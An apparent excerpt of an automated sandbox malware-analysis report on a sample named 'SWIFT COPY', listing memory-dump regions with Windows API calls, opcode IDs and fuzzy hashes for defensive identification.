                                                                                              • Instruction Fuzzy Hash: 372103B5D00249DFCB10DF9AC884ADEFBF8FB58320F108429E858A7251D379A944CFA1
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09B735E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fc7fd66c7df598a3d024afbb3fde7bac71df1d4e159debf54d0b991b55420c4d
                                                                                              • Instruction ID: 46f851708bbe644c863251800be000a272f9fff743e49e19d9325efe29ccf24a
                                                                                              • Opcode Fuzzy Hash: fc7fd66c7df598a3d024afbb3fde7bac71df1d4e159debf54d0b991b55420c4d
                                                                                              • Instruction Fuzzy Hash: D51137719002499FDB10DFAAC845ADEFFF5EF98320F148819E519A7250CB769940DFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 9bed36cc168eb61d763c4428e6c6cb4e5352a5edd0b92e52e930c052fb06863b
                                                                                              • Instruction ID: c35e8f7e6da27dd1be9d71023a714f08f938b78da564c1f05cc0cb5fb7788b12
                                                                                              • Opcode Fuzzy Hash: 9bed36cc168eb61d763c4428e6c6cb4e5352a5edd0b92e52e930c052fb06863b
                                                                                              • Instruction Fuzzy Hash: BF1176B1D00288CEDB20DFAAC4457AEFBF4EF98324F248459D019A7240CA79A840CB94
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,04FBE32C), ref: 04FBE566
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 8536c4c9eeccd8aa840b12176afa6676f12beb21702f027b78d85344acf8c516
                                                                                              • Instruction ID: 280671751ebafa1e217fa7fdd527e3dec402e964901f68dbcb05f981f040198d
                                                                                              • Opcode Fuzzy Hash: 8536c4c9eeccd8aa840b12176afa6676f12beb21702f027b78d85344acf8c516
                                                                                              • Instruction Fuzzy Hash: DA11F0B5D006498FDB10DF9AC844BDEFBF4EB89320F14845AE859A7201E379A546CFA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 708d39afa2cecd98e595815506249e5d186f33c539c062fda4ec0f9d1ae07341
                                                                                              • Instruction ID: 78cebe42339dcf46980561f3d0d51d4333ae69db13b592f40fda4d4ad83bc502
                                                                                              • Opcode Fuzzy Hash: 708d39afa2cecd98e595815506249e5d186f33c539c062fda4ec0f9d1ae07341
                                                                                              • Instruction Fuzzy Hash: 8A1136B1D003488FDB20DFAAC4457AEFBF9EF98724F248419D519A7240CB79A940CBA5
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 09B761BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 43e5102ef3cccf1abd90c6ae7e4099944755fcb138f6757d2fae7944bd95fccc
                                                                                              • Instruction ID: 915f8b311d62851205e1efc53874eb0093d18d0374253e53da1d57b8381e53e2
                                                                                              • Opcode Fuzzy Hash: 43e5102ef3cccf1abd90c6ae7e4099944755fcb138f6757d2fae7944bd95fccc
                                                                                              • Instruction Fuzzy Hash: BF11F2B5900748DFCB10DF9AC848BDEFBF8EB58320F148459E918A7601C375A944CFA5
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 09B761BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 38290bc26add1265680cc9c7c5c42874b8fd42baded1a74ee24946be6bdd7b17
                                                                                              • Instruction ID: f372d706f220d0893c3ee286278b17833eacdd16fea25eb34af3f5341062ad92
                                                                                              • Opcode Fuzzy Hash: 38290bc26add1265680cc9c7c5c42874b8fd42baded1a74ee24946be6bdd7b17
                                                                                              • Instruction Fuzzy Hash: F211F2B5800749DFDB10DF9AC885BDEFBF8EB58320F14845AE918A7611C375A944CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885311422.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_112d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc9b234458c7a65a0da3af3a039184594db7ea67df881bacab37a26f54c13de9
                                                                                              • Instruction ID: ac7ead0258c3d0d03af7f18882d496eae36a1f0d4ba87645d2f10c6db04c945f
                                                                                              • Opcode Fuzzy Hash: dc9b234458c7a65a0da3af3a039184594db7ea67df881bacab37a26f54c13de9
                                                                                              • Instruction Fuzzy Hash: 562125B1504240DFDF09DF58E9C0B26BFB5FB88318F24C569E9094B256C376D466CAA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885362073.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_113d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d5c706795dbb5e041825616251eb5bbca2f96cbce05329bcb54ae57ec900167
                                                                                              • Instruction ID: cc72ef30818026de09a5ecb7017f2de34c8f460fbac8448382f0a54c331a8f1a
                                                                                              • Opcode Fuzzy Hash: 6d5c706795dbb5e041825616251eb5bbca2f96cbce05329bcb54ae57ec900167
                                                                                              • Instruction Fuzzy Hash: 3D212971504200DFDF09DF98E5C0B26BFA5FBC8324F64C56DE9494B25AC736D406CA62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885362073.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_113d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ceed047987fbca737f333d2c226e9d83d948cc8419a85d66eaa4da93f47b78b0
                                                                                              • Instruction ID: 60de4b4c9e898ad1ca8e207ea1512f73f60ad8c94ea5dde0e8a8b3f06d0bc6db
                                                                                              • Opcode Fuzzy Hash: ceed047987fbca737f333d2c226e9d83d948cc8419a85d66eaa4da93f47b78b0
                                                                                              • Instruction Fuzzy Hash: BD2103B1504200DFDF19DF58E480B16FBA5FB88B14F64C56DE9494B24AC336D407CA62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885362073.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_113d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f59cb1d129ca149c3dfc6d95bdbb9844d3b7e0c563471a4b6b8949edddbbe83
                                                                                              • Instruction ID: b045b3f2393897d5e3d133b2012c99cf08e65452a0510bd5e343c2625996c2be
                                                                                              • Opcode Fuzzy Hash: 3f59cb1d129ca149c3dfc6d95bdbb9844d3b7e0c563471a4b6b8949edddbbe83
                                                                                              • Instruction Fuzzy Hash: 282180755083809FDB06CF64D994B11BF71EB86214F28C5DAD8498F2A7C33A981ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885311422.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_112d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                              • Instruction ID: 93369b73e9014f4bfaa2a801537934132b3ed96238e9d1a5d9021f37c5a20589
                                                                                              • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                                                              • Instruction Fuzzy Hash: 9911E172404280CFDF16CF54E5C0B16BF71FB84314F24C6A9D9094B256C33AD46ACBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885362073.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_113d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                              • Instruction ID: 3773ecb5980bc706c1bb510f62406d5bc9a1d147da496f4ed31f4fff3abd49a9
                                                                                              • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                                                              • Instruction Fuzzy Hash: D411BB75504280DFDB16CF54D5C0B15BFA1FB84224F24C6A9E8494B29AC33AD40ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885311422.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_112d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 80fbf72f5c6cb619e14a75909570e599e86738e75fe054047d35b99e0fe1b226
                                                                                              • Instruction ID: f00cdf453eb8eb7873e8c6ec7a9d680b55bf43fca3481804675f29ed5eae1903
                                                                                              • Opcode Fuzzy Hash: 80fbf72f5c6cb619e14a75909570e599e86738e75fe054047d35b99e0fe1b226
                                                                                              • Instruction Fuzzy Hash: 710120710057909AEB189E99DD84B66BFD8DF41328F08C519ED094F142D33D9840C672
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1885311422.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_112d000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e2b472563948716b2f5e4a95534f8c28efe4a07871ecd92af2d1593a6bea586
                                                                                              • Instruction ID: 7cce955ca34334025dd78478fc974b359f13844691bf3ec7dbca73a73441aafa
                                                                                              • Opcode Fuzzy Hash: 6e2b472563948716b2f5e4a95534f8c28efe4a07871ecd92af2d1593a6bea586
                                                                                              • Instruction Fuzzy Hash: 7EF0C232005680AEEB158E5AD884B62FFD8EB51738F18C45AFD084B287D3799840CBB1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: {#L
                                                                                              • API String ID: 0-1361971085
                                                                                              • Opcode ID: 18eaed715cfed09ea3b0132081d45dd287237770329d41a776e054d448d9824b
                                                                                              • Instruction ID: a81f0e17147f18b78cf9d93dfa2c49baff72c4e2197682ac30398e2398304c14
                                                                                              • Opcode Fuzzy Hash: 18eaed715cfed09ea3b0132081d45dd287237770329d41a776e054d448d9824b
                                                                                              • Instruction Fuzzy Hash: 76D1E170E05219DF8B18CFAAD98459EFBF2FF88350F14D52AE419AB224DB349942CF51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: {#L
                                                                                              • API String ID: 0-1361971085
                                                                                              • Opcode ID: 12f8559de294b9de09c25a8e8c6f52149bcecbcb41d66d2b8bda0ef3687d0cf5
                                                                                              • Instruction ID: ec9ab907247918f02eed942598a89876a810efa335bd9b9e94ff88cbd4807dfe
                                                                                              • Opcode Fuzzy Hash: 12f8559de294b9de09c25a8e8c6f52149bcecbcb41d66d2b8bda0ef3687d0cf5
                                                                                              • Instruction Fuzzy Hash: A8D1D170E05219DF8B18CFAAD98449EFBF2FF88350F14D52AE419AB224DB349942CF55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l|
                                                                                              • API String ID: 0-1955549514
                                                                                              • Opcode ID: 2d762fb1aa98fd8e54ac4bb14b4011ed799e13a1ccd86895f37f094fff948851
                                                                                              • Instruction ID: 7ac09d3e101cc2904ff29577496ef81105b805a6b255de6396211161510ac2de
                                                                                              • Opcode Fuzzy Hash: 2d762fb1aa98fd8e54ac4bb14b4011ed799e13a1ccd86895f37f094fff948851
                                                                                              • Instruction Fuzzy Hash: 06613A74E1520ADFDB04CF9AC5829AEFBB2FF84340F14D569C406A7254D7359A41CBD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 98R
                                                                                              • API String ID: 0-576591972
                                                                                              • Opcode ID: f955035a76382982e0eead0619e3d2f6557d120dbf38770af91653f674b75890
                                                                                              • Instruction ID: e99836ecb075fb665434b54f7e519ce0da4713afbeddd12ae310b5da329f4187
                                                                                              • Opcode Fuzzy Hash: f955035a76382982e0eead0619e3d2f6557d120dbf38770af91653f674b75890
                                                                                              • Instruction Fuzzy Hash: E87116B5E0920ADFCB18CF9AD5819AEFBB1FB89350F148529D415AB314D334AA42CF94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 98R
                                                                                              • API String ID: 0-576591972
                                                                                              • Opcode ID: 58ee048ab9926a549cba329a9c6d5c455b78fb60e9720e9597e8baffa4bb5cee
                                                                                              • Instruction ID: c341fa3efcf1fedb9fd7398af2d06f8e2d4ee95bfa7fbc6b6a7cd9d1b07ff995
                                                                                              • Opcode Fuzzy Hash: 58ee048ab9926a549cba329a9c6d5c455b78fb60e9720e9597e8baffa4bb5cee
                                                                                              • Instruction Fuzzy Hash: 98611975E0920ADFCB18CF9AD4819AEFBB2FF89350F148529D455AB314D3349A42CF94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: iUfo
                                                                                              • API String ID: 0-3820436262
                                                                                              • Opcode ID: 381cdc4cb82538566d995ff6dc85daf188a4f5e81e43ea44be10adff93eb8e93
                                                                                              • Instruction ID: b2c6460b74b53f9007fd7323cd2433fa5153ed6dde45fb5866d27eda2142d94c
                                                                                              • Opcode Fuzzy Hash: 381cdc4cb82538566d995ff6dc85daf188a4f5e81e43ea44be10adff93eb8e93
                                                                                              • Instruction Fuzzy Hash: 665104B4E052199FCB48CFAAD9455DEBBF2FF88340F10952AD805B7254E7389901CB95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: iUfo
                                                                                              • API String ID: 0-3820436262
                                                                                              • Opcode ID: 791b502f97af7ae61454c1356bf70862267aa3612f679ca6adb617ad32d65336
                                                                                              • Instruction ID: 505352da11f8840bcd6c137f633d419962ce26e3fcae51f0f1d8e1c21f01e412
                                                                                              • Opcode Fuzzy Hash: 791b502f97af7ae61454c1356bf70862267aa3612f679ca6adb617ad32d65336
                                                                                              • Instruction Fuzzy Hash: 0551E1B4E052199FCB48CFAAD9455EEFBF2FF88340F10952AE805B7254E7385942CB94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l|
                                                                                              • API String ID: 0-1955549514
                                                                                              • Opcode ID: fd238953a807753add236785fcabd46de2888d752a1b7605aee6c2d417b33507
                                                                                              • Instruction ID: 776add0f9a2ae611c645845f7eba47b376ba1f7f5349b211d4625a8d1a2e41ca
                                                                                              • Opcode Fuzzy Hash: fd238953a807753add236785fcabd46de2888d752a1b7605aee6c2d417b33507
                                                                                              • Instruction Fuzzy Hash: F5517D70E0560AEFDB04CFA9C4825AEFBB2FF89350F10D9AAD416A7254D7349A41CF91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: w7e^
                                                                                              • API String ID: 0-1657886525
                                                                                              • Opcode ID: daabe8513ca79a1febe3143430be3fced687376498ad0c99b04a8855c7791b3f
                                                                                              • Instruction ID: da1ed3eb62cfa9e1340da06fbb075e2c8739773e19e9d9532b642b2b66ea2f95
                                                                                              • Opcode Fuzzy Hash: daabe8513ca79a1febe3143430be3fced687376498ad0c99b04a8855c7791b3f
                                                                                              • Instruction Fuzzy Hash: 1C41F2B4D05219DBCB04CFABC9486EEFBB5FB89341F14982AC516B7254D3384642CFA9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: w7e^
                                                                                              • API String ID: 0-1657886525
                                                                                              • Opcode ID: 04a9fa56543729f4f93344beffba3129bd2645e7701ac2519a8ecf28255fd3ba
                                                                                              • Instruction ID: 94aff8d1cb0f25b6128d00740c588dcc012f5e75990c9cf3cb3ea8dc93cde322
                                                                                              • Opcode Fuzzy Hash: 04a9fa56543729f4f93344beffba3129bd2645e7701ac2519a8ecf28255fd3ba
                                                                                              • Instruction Fuzzy Hash: DF4102B0D0521ADFCB08CFA6C9486EEFBB6FB89341F14982AC515B7254D3384642CF99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0ni
                                                                                              • API String ID: 0-1488673370
                                                                                              • Opcode ID: f2897efd993df442cffec51b69a8b57b57cd70d2c51588db4d57cfe84eb29d74
                                                                                              • Instruction ID: 2b55e6863cfc04056885440cb900f6b2a4b2610887d7f1738ef07f7e5ce923b0
                                                                                              • Opcode Fuzzy Hash: f2897efd993df442cffec51b69a8b57b57cd70d2c51588db4d57cfe84eb29d74
                                                                                              • Instruction Fuzzy Hash: FF514A71E056188BDB58DF6B8D4579EFAF7BFC8301F14C1BA950CA6214EB340A868F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0ni
                                                                                              • API String ID: 0-1488673370
                                                                                              • Opcode ID: 0ee2d1c28820e2659896359b7904f42c0d4c9ad6cafb516b289b4a03bcc72d0f
                                                                                              • Instruction ID: 3908b0b289e2568e9ea58d2e085167ad1cfb9a87e2d16803464207f52a8d1f57
                                                                                              • Opcode Fuzzy Hash: 0ee2d1c28820e2659896359b7904f42c0d4c9ad6cafb516b289b4a03bcc72d0f
                                                                                              • Instruction Fuzzy Hash: EF513CB1E056188BDB58DF6BCD4579AFAF3AFC8300F14C1BA940CA6264DB3419858F51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c16b4d05e6fe1ee2150740ceaa0d58269345444a819fb7287ceddfe387e805d9
                                                                                              • Instruction ID: a6d6353b3c04057a57ac06e2422ab55e00126b98e6b1a0b8f2e8ffc5227ecdf0
                                                                                              • Opcode Fuzzy Hash: c16b4d05e6fe1ee2150740ceaa0d58269345444a819fb7287ceddfe387e805d9
                                                                                              • Instruction Fuzzy Hash: 08D1BE707007048FEB19EB76C8907AAB7F6AF89714F1089ADD156CB290DF35E902C791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7a1ad114dc4e7d6307765d48065d42336c96651ab9dc1488d793cc028a1c0213
                                                                                              • Instruction ID: 0e3700e2b12e3c992e0ac7dd273c81188b14ada68dfa4466024428350e067773
                                                                                              • Opcode Fuzzy Hash: 7a1ad114dc4e7d6307765d48065d42336c96651ab9dc1488d793cc028a1c0213
                                                                                              • Instruction Fuzzy Hash: 3AE1F774E042599FCB14CFA8C5819AEFBF2FF89314F248269E855AB355C734A941CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66f57e1926974a696d0848ac25d87cc1c1d9f5cc7c34e1990c1f714568bd9262
                                                                                              • Instruction ID: 0ff1553a821f25a469df547422623045c0c7d15144d31d7ca22781885b5c3f50
                                                                                              • Opcode Fuzzy Hash: 66f57e1926974a696d0848ac25d87cc1c1d9f5cc7c34e1990c1f714568bd9262
                                                                                              • Instruction Fuzzy Hash: 5BE1F474E002599FCB14CFA8D5809AEFBF2FF89314F248269E414AB355D734A942DFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd3790b3bf8dadf3647752f1a3b6f734bf7b9035eda62ddd982916492ac8b85c
                                                                                              • Instruction ID: acda422a34ae9ada00362b858f05fff0af9c03691893e0dbc30e4f22a54916b8
                                                                                              • Opcode Fuzzy Hash: dd3790b3bf8dadf3647752f1a3b6f734bf7b9035eda62ddd982916492ac8b85c
                                                                                              • Instruction Fuzzy Hash: 3FE10574E042198FCB14CFA9D5819AEFBF2FF88310F248269E415AB355D735A942CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0783323308a7e10539f4217131cf20154ebd8fb4087b1206a7d00d5f74555149
                                                                                              • Instruction ID: 8512e70d40b72cce753d92bba7ab956b1777a172bbc50f07863b578c03c64322
                                                                                              • Opcode Fuzzy Hash: 0783323308a7e10539f4217131cf20154ebd8fb4087b1206a7d00d5f74555149
                                                                                              • Instruction Fuzzy Hash: 36E1E6B4E042199FCB14CFA8C5819AEFBB2FF89314F24C269D415AB355D734A942CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d5c50ad261837fba0b40522f085d386f7152be18fd6ebc069b1e45848851dcc
                                                                                              • Instruction ID: dd3ff0fe73daa90111530c4a69fb215749b4ca030682d04fe99ad35c44d2ce2d
                                                                                              • Opcode Fuzzy Hash: 7d5c50ad261837fba0b40522f085d386f7152be18fd6ebc069b1e45848851dcc
                                                                                              • Instruction Fuzzy Hash: 75E1F574E002598FCB14CFA9C5819AEFBF2FF89314F248269D464AB355D734A942CFA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
